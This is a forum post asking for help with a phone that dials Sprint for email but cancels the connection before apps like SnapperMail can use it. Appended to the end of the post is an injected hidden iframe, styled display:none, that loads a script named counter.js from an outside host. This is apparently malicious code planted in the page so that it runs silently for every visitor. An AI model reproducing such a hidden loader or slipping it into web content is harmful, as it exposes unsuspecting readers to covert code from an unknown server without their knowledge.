I know this issue was discussed in an Earthlink thread, but I'm still lost at sea...

Since QNC does not work outside of a VZW area, I have to have a backup way of dialing up my ISP for email. My company uses Sprint for nationwide dialup, so I created a "Service" for it. I inserted username, password, phone number. I left it as a PPP connection and tried it.

The message box shows "Initializing", then "Dialing Sprint", then "Cancelling...". Following that, the connection light (green) comes on, but it's too late for SnapperMail (or any other app). If I switch to the phone side, I see "Standard Data Rate" and the timer is incrementing. I have to manually end the call or I can wait about 50 seconds and the call disconnects itself (I assume failed authentication).

I've tried it both with and without scripts, have spoken to both Kyo and Sprint support, and have gotten nowhere. Anybody have an idea??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
